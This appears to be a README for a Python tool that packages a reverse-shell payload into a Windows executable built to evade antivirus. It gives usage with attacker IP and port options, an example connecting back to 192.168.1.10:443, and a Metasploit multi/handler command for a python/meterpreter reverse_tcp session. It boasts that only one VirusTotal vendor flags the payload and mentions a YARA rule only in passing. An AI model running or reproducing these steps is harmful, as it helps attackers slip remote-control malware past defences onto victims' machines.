Simple python script to evade antiviruses on fully patched and updated Windows environments using a py2exe.
python aepy2exe.py -ip 192.168.1.10 -p 443
C:\>python aepy2exe.py -h
Antivirus Evasion Py2exe
,. . ,--. ;-. ,-.
/ \ | o o | o | ) )
|--| ;-. |- . . , . ;-. . . ,-. |- . , ,-: ,-. . ,-. ;-. |-' . . / ,-. . , ,-.
| | | | | | |/ | | | | `-. | |/ | | `-. | | | | | | | | / |-' X |-'
' ' ' ' `-' ' ' ' ' `-` `-' `--' ' `-` `-' ' `-' ' ' ' `-| '--' `-' ' ` `-'
`-'
usage: aepy2exe.py [-h] [-e EXECUTE] [-ip ATTACKER_IP] [-p PORT]
Antivirus Evasion Py2exe
optional arguments:
-h, --help show this help message and exit
-ip ATTACKER_IP, --attacker_ip ATTACKER_IP
specified attacker IP
-p PORT, --port PORT specified attcaker port
Example:
C:\>python aepy2exe.py -e py2exe -ip <ip_address> -p <port>
The script will generate CyberY.exe.
In case there is an error such as The system cannot open the device or file specified. Try hard!!
C:\>.\CyberY.exe
sudo msfconsole -x "use exploit/multi/handler; set PAYLOAD python/meterpreter/reverse_tcp; set LPORT 443; set LHOST 192.168.1.10"
msf6 exploit(multi/handler) > exploit
You can check the Yara rule to identify the file as it's not detected by windows defender.
Keep in mind that attempting antivirus bypass is a game. Whenever a new evasion technique gets popular, antivirus vendors will eventually learn about itand update their signatures database to block it. Then, new evasion techniques will a rise, which will make vendors to add it to their signature database, and so on.
By the time of this writing, the payload was flagged as malicious by only one vendor on Virus Total.
Credit Marcelo Sacchetin